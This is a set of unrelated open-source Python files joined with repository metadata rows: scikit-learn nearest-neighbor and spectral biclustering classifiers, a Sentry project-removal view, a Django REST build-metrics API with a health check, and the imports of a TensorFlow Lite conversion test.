>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import KNeighborsClassifier
>>> neigh = KNeighborsClassifier(n_neighbors=3)
>>> neigh.fit(X, y)
KNeighborsClassifier(...)
>>> print(neigh.predict([[1.1]]))
[0]
>>> print(neigh.predict_proba([[0.9]]))
[[0.66666667 0.33333333]]
See also
--------
RadiusNeighborsClassifier
KNeighborsRegressor
RadiusNeighborsRegressor
NearestNeighbors
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances
but different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
@_deprecate_positional_args
def __init__(self, n_neighbors=5, *,
weights='uniform', algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, n_jobs=None,
**kwargs):
super().__init__(
n_neighbors=n_neighbors,
algorithm=algorithm,
leaf_size=leaf_size, metric=metric, p=p,
metric_params=metric_params,
n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
def fit(self, X, y):
"""Fit the k-nearest neighbors classifier from the training dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features) or \
(n_samples, n_samples) if metric='precomputed'
Training data.
y : {array-like, sparse matrix} of shape (n_samples,) or \
(n_samples, n_outputs)
Target values.
Returns
-------
self : KNeighborsClassifier
The fitted k-nearest neighbors classifier.
"""
return self._fit(X, y)
def predict(self, X):
"""Predict the class labels for the provided data.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : ndarray of shape (n_queries,) or (n_queries, n_outputs)
Class labels for each data sample.
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
n_outputs = len(classes_)
n_queries = _num_samples(X)
weights = _get_weights(neigh_dist, self.weights)
y_pred = np.empty((n_queries, n_outputs), dtype=classes_[0].dtype)
for k, classes_k in enumerate(classes_):
if weights is None:
mode, _ = stats.mode(_y[neigh_ind, k], axis=1)
else:
mode, _ = weighted_mode(_y[neigh_ind, k], weights, axis=1)
mode = np.asarray(mode.ravel(), dtype=np.intp)
y_pred[:, k] = classes_k.take(mode)
if not self.outputs_2d_:
y_pred = y_pred.ravel()
return y_pred
def predict_proba(self, X):
"""Return probability estimates for the test data X.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
p : ndarray of shape (n_queries, n_classes), or a list of n_outputs
of such arrays if n_outputs > 1.
The class probabilities of the input samples. Classes are ordered
by lexicographic order.
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
n_queries = _num_samples(X)
weights = _get_weights(neigh_dist, self.weights)
if weights is None:
weights = np.ones_like(neigh_ind)
all_rows = np.arange(X.shape[0])
probabilities = []
for k, classes_k in enumerate(classes_):
pred_labels = _y[:, k][neigh_ind]
proba_k = np.zeros((n_queries, classes_k.size))
# a simple ':' index doesn't work right
for i, idx in enumerate(pred_labels.T): # loop is O(n_neighbors)
proba_k[all_rows, idx] += weights[:, i]
# normalize 'votes' into real [0,1] probabilities
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
probabilities.append(proba_k)
if not self.outputs_2d_:
probabilities = probabilities[0]
return probabilities
class RadiusNeighborsClassifier(RadiusNeighborsMixin,
ClassifierMixin,
NeighborsBase):
"""Classifier implementing a vote among neighbors within a given radius
Read more in the :ref:`User Guide <classification>`.
Parameters
----------
radius : float, default=1.0
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : {'uniform', 'distance'} or callable, default='uniform'
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, default=30
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : int, default=2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : str or callable, default='minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of :class:`DistanceMetric` for a
list of available metrics.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit. X may be a :term:`sparse graph`,
in which case only "nonzero" elements may be considered neighbors.
outlier_label : {manual label, 'most_frequent'}, default=None
label for outlier samples (samples with no neighbors in given radius).
- manual label: str or int label (should be the same type as y)
or list of manual labels if multi-output is used.
- 'most_frequent' : assign the most frequent label of y to outliers.
- None : when any outlier is detected, ValueError will be raised.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
classes_ : ndarray of shape (n_classes,)
Class labels known to the classifier.
effective_metric_ : str or callable
The distance metric used. It will be same as the `metric` parameter
or a synonym of it, e.g. 'euclidean' if the `metric` parameter set to
'minkowski' and `p` parameter set to 2.
effective_metric_params_ : dict
Additional keyword arguments for the metric function. For most metrics
will be same with `metric_params` parameter, but may also contain the
`p` parameter value if the `effective_metric_` attribute is set to
'minkowski'.
n_samples_fit_ : int
Number of samples in the fitted data.
outlier_label_ : int or array-like of shape (n_class,)
Label which is given for outlier samples (samples with no neighbors
on given radius).
outputs_2d_ : bool
False when `y`'s shape is (n_samples, ) or (n_samples, 1) during fit
otherwise True.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import RadiusNeighborsClassifier
>>> neigh = RadiusNeighborsClassifier(radius=1.0)
>>> neigh.fit(X, y)
RadiusNeighborsClassifier(...)
>>> print(neigh.predict([[1.5]]))
[0]
>>> print(neigh.predict_proba([[1.0]]))
[[0.66666667 0.33333333]]
See also
--------
KNeighborsClassifier
RadiusNeighborsRegressor
KNeighborsRegressor
NearestNeighbors
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
@_deprecate_positional_args
def __init__(self, radius=1.0, *, weights='uniform',
algorithm='auto', leaf_size=30, p=2, metric='minkowski',
outlier_label=None, metric_params=None, n_jobs=None,
**kwargs):
super().__init__(
radius=radius,
algorithm=algorithm,
leaf_size=leaf_size,
metric=metric, p=p, metric_params=metric_params,
n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
self.outlier_label = outlier_label
def fit(self, X, y):
"""Fit the radius neighbors classifier from the training dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features) or \
(n_samples, n_samples) if metric='precomputed'
Training data.
y : {array-like, sparse matrix} of shape (n_samples,) or \
(n_samples, n_outputs)
Target values.
Returns
-------
self : RadiusNeighborsClassifier
The fitted radius neighbors classifier.
"""
self._fit(X, y)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
if self.outlier_label is None:
outlier_label_ = None
elif self.outlier_label == 'most_frequent':
outlier_label_ = []
# iterate over multi-output, get the most frequent label for each
# output.
for k, classes_k in enumerate(classes_):
label_count = np.bincount(_y[:, k])
outlier_label_.append(classes_k[label_count.argmax()])
else:
if (_is_arraylike(self.outlier_label) and
not isinstance(self.outlier_label, str)):
if len(self.outlier_label) != len(classes_):
raise ValueError("The length of outlier_label: {} is "
"inconsistent with the output "
"length: {}".format(self.outlier_label,
len(classes_)))
outlier_label_ = self.outlier_label
else:
outlier_label_ = [self.outlier_label] * len(classes_)
for classes, label in zip(classes_, outlier_label_):
if (_is_arraylike(label) and
not isinstance(label, str)):
# ensure the outlier lable for each output is a scalar.
raise TypeError("The outlier_label of classes {} is "
"supposed to be a scalar, got "
"{}.".format(classes, label))
if np.append(classes, label).dtype != classes.dtype:
# ensure the dtype of outlier label is consistent with y.
raise TypeError("The dtype of outlier_label {} is "
"inconsistent with classes {} in "
"y.".format(label, classes))
self.outlier_label_ = outlier_label_
return self
def predict(self, X):
"""Predict the class labels for the provided data.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : ndarray of shape (n_queries,) or (n_queries, n_outputs)
Class labels for each data sample.
"""
probs = self.predict_proba(X)
classes_ = self.classes_
if not self.outputs_2d_:
probs = [probs]
classes_ = [self.classes_]
n_outputs = len(classes_)
n_queries = probs[0].shape[0]
y_pred = np.empty((n_queries, n_outputs), dtype=classes_[0].dtype)
for k, prob in enumerate(probs):
# iterate over multi-output, assign labels based on probabilities
# of each output.
max_prob_index = prob.argmax(axis=1)
y_pred[:, k] = classes_[k].take(max_prob_index)
outlier_zero_probs = (prob == 0).all(axis=1)
if outlier_zero_probs.any():
zero_prob_index = np.flatnonzero(outlier_zero_probs)
y_pred[zero_prob_index, k] = self.outlier_label_[k]
if not self.outputs_2d_:
y_pred = y_pred.ravel()
return y_pred
def predict_proba(self, X):
"""Return probability estimates for the test data X.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
p : ndarray of shape (n_queries, n_classes), or a list of n_outputs
of such arrays if n_outputs > 1.
The class probabilities of the input samples. Classes are ordered
by lexicographic order.
"""
X = check_array(X, accept_sparse='csr')
n_queries = _num_samples(X)
neigh_dist, neigh_ind = self.radius_neighbors(X)
outlier_mask = np.zeros(n_queries, dtype=bool)
outlier_mask[:] = [len(nind) == 0 for nind in neigh_ind]
outliers = np.flatnonzero(outlier_mask)
inliers = np.flatnonzero(~outlier_mask)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
if self.outlier_label_ is None and outliers.size > 0:
raise ValueError('No neighbors found for test samples %r, '
'you can try using larger radius, '
'giving a label for outliers, '
'or considering removing them from your dataset.'
% outliers)
weights = _get_weights(neigh_dist, self.weights)
if weights is not None:
weights = weights[inliers]
probabilities = []
# iterate over multi-output, measure probabilities of the k-th output.
for k, classes_k in enumerate(classes_):
pred_labels = np.zeros(len(neigh_ind), dtype=object)
pred_labels[:] = [_y[ind, k] for ind in neigh_ind]
proba_k = np.zeros((n_queries, classes_k.size))
proba_inl = np.zeros((len(inliers), classes_k.size))
# samples have different size of neighbors within the same radius
if weights is None:
for i, idx in enumerate(pred_labels[inliers]):
proba_inl[i, :] = np.bincount(idx,
minlength=classes_k.size)
else:
for i, idx in enumerate(pred_labels[inliers]):
proba_inl[i, :] = np.bincount(idx,
weights[i],
minlength=classes_k.size)
proba_k[inliers, :] = proba_inl
if outliers.size > 0:
_outlier_label = self.outlier_label_[k]
label_index = np.flatnonzero(classes_k == _outlier_label)
if label_index.size == 1:
proba_k[outliers, label_index[0]] = 1.0
else:
warnings.warn('Outlier label {} is not in training '
'classes. All class probabilities of '
'outliers will be assigned with 0.'
''.format(self.outlier_label_[k]))
# normalize 'votes' into real [0,1] probabilities
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
probabilities.append(proba_k)
if not self.outputs_2d_:
probabilities = probabilities[0]
return probabilities
| bsd-3-clause | 5,520,555,482,386,144,000 | 36.798701 | 79 | 0.577478 | false |
BayanGroup/sentry | src/sentry/web/frontend/remove_project.py | 1 | 1378 | from __future__ import absolute_import
from django import forms
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from sentry.api import client
from sentry.models import OrganizationMemberType
from sentry.web.frontend.base import ProjectView
class RemoveProjectForm(forms.Form):
pass
class RemoveProjectView(ProjectView):
required_access = OrganizationMemberType.OWNER
sudo_required = True
def get_form(self, request):
if request.method == 'POST':
return RemoveProjectForm(request.POST)
return RemoveProjectForm()
def handle(self, request, organization, team, project):
form = self.get_form(request)
if form.is_valid():
client.delete('/projects/{}/{}/'.format(organization.slug, project.slug),
request.user, is_sudo=True)
messages.add_message(
request, messages.SUCCESS,
_(u'The project %r was scheduled for deletion.') % (project.name.encode('utf-8'),))
return HttpResponseRedirect(reverse('sentry-organization-home', args=[team.organization.slug]))
context = {
'form': form,
}
return self.respond('sentry/projects/remove.html', context)
| bsd-3-clause | 7,260,892,795,162,825,000 | 30.318182 | 107 | 0.674891 | false |
eickenberg/scikit-learn | sklearn/cluster/bicluster/spectral.py | 1 | 19540 | """Implements spectral biclustering algorithms.
Authors : Kemal Eren
License: BSD 3 clause
"""
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import dia_matrix
from scipy.sparse import issparse
from sklearn.base import BaseEstimator, BiclusterMixin
from sklearn.externals import six
from sklearn.utils.arpack import svds
from sklearn.utils.arpack import eigsh
from sklearn.cluster import KMeans
from sklearn.cluster import MiniBatchKMeans
from sklearn.utils.extmath import randomized_svd
from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.extmath import make_nonnegative
from sklearn.utils.extmath import norm
from sklearn.utils.validation import assert_all_finite
from sklearn.utils.validation import check_array
from .utils import check_array_ndim
def _scale_normalize(X):
"""Normalize ``X`` by scaling rows and columns independently.
Returns the normalized matrix and the row and column scaling
factors.
"""
X = make_nonnegative(X)
row_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=1))).squeeze()
col_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=0))).squeeze()
row_diag = np.where(np.isnan(row_diag), 0, row_diag)
col_diag = np.where(np.isnan(col_diag), 0, col_diag)
if issparse(X):
n_rows, n_cols = X.shape
r = dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
c = dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
an = r * X * c
else:
an = row_diag[:, np.newaxis] * X * col_diag
return an, row_diag, col_diag
def _bistochastic_normalize(X, max_iter=1000, tol=1e-5):
"""Normalize rows and columns of ``X`` simultaneously so that all
rows sum to one constant and all columns sum to a different
constant.
"""
# According to paper, this can also be done more efficiently with
# deviation reduction and balancing algorithms.
X = make_nonnegative(X)
X_scaled = X
dist = None
for _ in range(max_iter):
X_new, _, _ = _scale_normalize(X_scaled)
if issparse(X):
dist = norm(X_scaled.data - X.data)
else:
dist = norm(X_scaled - X_new)
X_scaled = X_new
if dist is not None and dist < tol:
break
return X_scaled
def _log_normalize(X):
"""Normalize ``X`` according to Kluger's log-interactions scheme."""
X = make_nonnegative(X, min_value=1)
if issparse(X):
raise ValueError("Cannot compute log of a sparse matrix,"
" because log(x) diverges to -infinity as x"
" goes to 0.")
L = np.log(X)
row_avg = L.mean(axis=1)[:, np.newaxis]
col_avg = L.mean(axis=0)
avg = L.mean()
return L - row_avg - col_avg + avg
class BaseSpectral(six.with_metaclass(ABCMeta, BaseEstimator,
BiclusterMixin)):
"""Base class for spectral biclustering."""
@abstractmethod
def __init__(self, n_clusters=3, svd_method="randomized",
n_svd_vecs=None, mini_batch=False, init="k-means++",
n_init=10, n_jobs=1, random_state=None):
self.n_clusters = n_clusters
self.svd_method = svd_method
self.n_svd_vecs = n_svd_vecs
self.mini_batch = mini_batch
self.init = init
self.n_init = n_init
self.n_jobs = n_jobs
self.random_state = random_state
def _check_parameters(self):
legal_svd_methods = ('randomized', 'arpack')
if self.svd_method not in legal_svd_methods:
raise ValueError("Unknown SVD method: '{0}'. svd_method must be"
" one of {1}.".format(self.svd_method,
legal_svd_methods))
def fit(self, X):
"""Creates a biclustering for X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
"""
X = check_array(X, accept_sparse='csr', dtype=np.float64)
check_array_ndim(X)
self._check_parameters()
self._fit(X)
def _svd(self, array, n_components, n_discard):
"""Returns first `n_components` left and right singular
vectors u and v, discarding the first `n_discard`.
"""
if self.svd_method == 'randomized':
kwargs = {}
if self.n_svd_vecs is not None:
kwargs['n_oversamples'] = self.n_svd_vecs
u, _, vt = randomized_svd(array, n_components,
random_state=self.random_state,
**kwargs)
elif self.svd_method == 'arpack':
u, _, vt = svds(array, k=n_components, ncv=self.n_svd_vecs)
if np.any(np.isnan(vt)):
# some eigenvalues of A * A.T are negative, causing
# sqrt() to be np.nan. This causes some vectors in vt
# to be np.nan.
_, v = eigsh(safe_sparse_dot(array.T, array),
ncv=self.n_svd_vecs)
vt = v.T
if np.any(np.isnan(u)):
_, u = eigsh(safe_sparse_dot(array, array.T),
ncv=self.n_svd_vecs)
assert_all_finite(u)
assert_all_finite(vt)
u = u[:, n_discard:]
vt = vt[n_discard:]
return u, vt.T
def _k_means(self, data, n_clusters):
if self.mini_batch:
model = MiniBatchKMeans(n_clusters,
init=self.init,
n_init=self.n_init,
random_state=self.random_state)
else:
model = KMeans(n_clusters, init=self.init,
n_init=self.n_init, n_jobs=self.n_jobs,
random_state=self.random_state)
model.fit(data)
centroid = model.cluster_centers_
labels = model.labels_
return centroid, labels
class SpectralCoclustering(BaseSpectral):
"""Spectral Co-Clustering algorithm (Dhillon, 2001).
Clusters rows and columns of an array `X` to solve the relaxed
normalized cut of the bipartite graph created from `X` as follows:
the edge between row vertex `i` and column vertex `j` has weight
`X[i, j]`.
The resulting bicluster structure is block-diagonal, since each
row and each column belongs to exactly one bicluster.
Supports sparse matrices, as long as they are nonnegative.
Parameters
----------
n_clusters : integer, optional, default: 3
The number of biclusters to find.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', use
:func:`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', use
:func:`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
`svd_method` is 'randomized`.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
`rows_` : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
`columns_` : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
`row_labels_` : array-like, shape (n_rows,)
The bicluster label of each row.
`column_labels_` : array-like, shape (n_cols,)
The bicluster label of each column.
References
----------
* Dhillon, Inderjit S, 2001. `Co-clustering documents and words using
bipartite spectral graph partitioning
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.140.3011>`__.
"""
def __init__(self, n_clusters=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralCoclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
def _fit(self, X):
normalized_data, row_diag, col_diag = _scale_normalize(X)
n_sv = 1 + int(np.ceil(np.log2(self.n_clusters)))
u, v = self._svd(normalized_data, n_sv, n_discard=1)
z = np.vstack((row_diag[:, np.newaxis] * u,
col_diag[:, np.newaxis] * v))
_, labels = self._k_means(z, self.n_clusters)
n_rows = X.shape[0]
self.row_labels_ = labels[:n_rows]
self.column_labels_ = labels[n_rows:]
self.rows_ = np.vstack(self.row_labels_ == c
for c in range(self.n_clusters))
self.columns_ = np.vstack(self.column_labels_ == c
for c in range(self.n_clusters))
class SpectralBiclustering(BaseSpectral):
"""Spectral biclustering (Kluger, 2003).
Partitions rows and columns under the assumption that the data has
an underlying checkerboard structure. For instance, if there are
two row partitions and three column partitions, each row will
belong to three biclusters, and each column will belong to two
biclusters. The outer product of the corresponding row and column
label vectors gives this checkerboard structure.
Parameters
----------
n_clusters : integer or tuple (n_row_clusters, n_column_clusters)
The number of row and column clusters in the checkerboard
structure.
method : string, optional, default: 'bistochastic'
Method of normalizing and converting singular vectors into
biclusters. May be one of 'scale', 'bistochastic', or 'log'.
The authors recommend using 'log'. If the data is sparse,
however, log normalization will not work, which is why the
default is 'bistochastic'. CAUTION: if `method='log'`, the
data must not be sparse.
n_components : integer, optional, default: 6
Number of singular vectors to check.
n_best : integer, optional, default: 3
Number of best singular vectors to which to project the data
for clustering.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', uses
`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', uses
`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
`svd_method` is 'randomized`.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
`rows_` : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
`columns_` : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
`row_labels_` : array-like, shape (n_rows,)
Row partition labels.
`column_labels_` : array-like, shape (n_cols,)
Column partition labels.
References
----------
* Kluger, Yuval, et. al., 2003. `Spectral biclustering of microarray
data: coclustering genes and conditions
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.135.1608>`__.
"""
def __init__(self, n_clusters=3, method='bistochastic',
n_components=6, n_best=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralBiclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
self.method = method
self.n_components = n_components
self.n_best = n_best
def _check_parameters(self):
super(SpectralBiclustering, self)._check_parameters()
legal_methods = ('bistochastic', 'scale', 'log')
if self.method not in legal_methods:
raise ValueError("Unknown method: '{0}'. method must be"
" one of {1}.".format(self.method, legal_methods))
try:
int(self.n_clusters)
except TypeError:
try:
r, c = self.n_clusters
int(r)
int(c)
except (ValueError, TypeError):
raise ValueError("Incorrect parameter n_clusters has value:"
" {}. It should either be a single integer"
" or an iterable with two integers:"
" (n_row_clusters, n_column_clusters)")
if self.n_components < 1:
raise ValueError("Parameter n_components must be greater than 0,"
" but its value is {}".format(self.n_components))
if self.n_best < 1:
raise ValueError("Parameter n_best must be greater than 0,"
" but its value is {}".format(self.n_best))
if self.n_best > self.n_components:
raise ValueError("n_best cannot be larger than"
" n_components, but {} > {}"
"".format(self.n_best, self.n_components))
def _fit(self, X):
n_sv = self.n_components
if self.method == 'bistochastic':
normalized_data = _bistochastic_normalize(X)
n_sv += 1
elif self.method == 'scale':
normalized_data, _, _ = _scale_normalize(X)
n_sv += 1
elif self.method == 'log':
normalized_data = _log_normalize(X)
n_discard = 0 if self.method == 'log' else 1
u, v = self._svd(normalized_data, n_sv, n_discard)
ut = u.T
vt = v.T
try:
n_row_clusters, n_col_clusters = self.n_clusters
except TypeError:
n_row_clusters = n_col_clusters = self.n_clusters
best_ut = self._fit_best_piecewise(ut, self.n_best,
n_row_clusters)
best_vt = self._fit_best_piecewise(vt, self.n_best,
n_col_clusters)
self.row_labels_ = self._project_and_cluster(X, best_vt.T,
n_row_clusters)
self.column_labels_ = self._project_and_cluster(X.T, best_ut.T,
n_col_clusters)
self.rows_ = np.vstack(self.row_labels_ == label
for label in range(n_row_clusters)
for _ in range(n_col_clusters))
self.columns_ = np.vstack(self.column_labels_ == label
for _ in range(n_row_clusters)
for label in range(n_col_clusters))
def _fit_best_piecewise(self, vectors, n_best, n_clusters):
"""Find the ``n_best`` vectors that are best approximated by piecewise
constant vectors.
The piecewise vectors are found by k-means; the best is chosen
according to Euclidean distance.
"""
def make_piecewise(v):
centroid, labels = self._k_means(v.reshape(-1, 1), n_clusters)
return centroid[labels].ravel()
piecewise_vectors = np.apply_along_axis(make_piecewise,
axis=1, arr=vectors)
dists = np.apply_along_axis(norm, axis=1,
arr=(vectors - piecewise_vectors))
result = vectors[np.argsort(dists)[:n_best]]
return result
def _project_and_cluster(self, data, vectors, n_clusters):
"""Project ``data`` to ``vectors`` and cluster the result."""
projected = safe_sparse_dot(data, vectors)
_, labels = self._k_means(projected, n_clusters)
return labels
| bsd-3-clause | 3,698,149,455,247,156,700 | 38.554656 | 79 | 0.56607 | false |
TangentMicroServices/BuildService | api/views.py | 1 | 2442 | from django.contrib.auth.models import User
from api.models import Build, Metric, Smell
from rest_framework import routers, serializers, viewsets, decorators, response
from api.permissions import IsSelfOrSuperUser
from api.serializers import BuildSerializer, MetricSerializer, SmellSerializer
from rest_framework.permissions import IsAuthenticated, AllowAny
# Serializers define the API representation.
class MetricViewSet(viewsets.ModelViewSet):
queryset = Metric.objects.all()
serializer_class = MetricSerializer
class BuildViewSet(viewsets.ModelViewSet):
queryset = Build.objects.all()
serializer_class = BuildSerializer
class SmellViewSet(viewsets.ModelViewSet):
queryset = Smell.objects.all()
serializer_class = SmellSerializer
class HealthViewSet(viewsets.ViewSet):
permission_classes = (AllowAny, )
def list(self, request, format=None):
# make sure we can connect to the database
all_statuses = []
status = "up"
db_status = self.__can_connect_to_db()
all_statuses.append(db_status)
if "down" in all_statuses:
status = "down"
data = {
"data": {
"explorer": "/api-explorer",
},
"status": {
"db": db_status,
"status": status
}
}
return response.Response(data)
def __can_connect_to_db(self):
try:
user = User.objects.first()
return "up"
except Exception:
return "down"
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'health', HealthViewSet, base_name='health')
router.register(r'build', BuildViewSet, base_name='build')
router.register(r'metric', MetricViewSet, base_name='metric')
router.register(r'smell', SmellViewSet, base_name='smell')
"""
List all users.
**Notes:**
* Requires authenticated user
**Example usage:**
import requests
response = requests.get('/users/')
**Example response:**
[
{
"url": "http://192.168.99.100:8000/users/1/",
"username": "admin",
"email": "[email protected]",
"is_staff": true,
"first_name": "",
"last_name": ""
}
]
---
responseMessages:
- code: 403
message: Not authenticated
consumes:
- application/json
produces:
- application/json
""" | mit | 4,265,018,532,309,362,000 | 22.266667 | 79 | 0.63145 | false |
jhseu/tensorflow | tensorflow/lite/python/convert_test.py | 1 | 17122 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow Lite Python Interface: Sanity check."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.lite.python import convert
from tensorflow.lite.python import lite_constants
from tensorflow.lite.python import op_hint
from tensorflow.lite.python.interpreter import Interpreter
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.graph_util_impl import _bfs_for_reachable_nodes
from tensorflow.python.framework.graph_util_impl import _extract_graph_summary
from tensorflow.python.framework.graph_util_impl import _node_name
from tensorflow.python.ops import array_ops
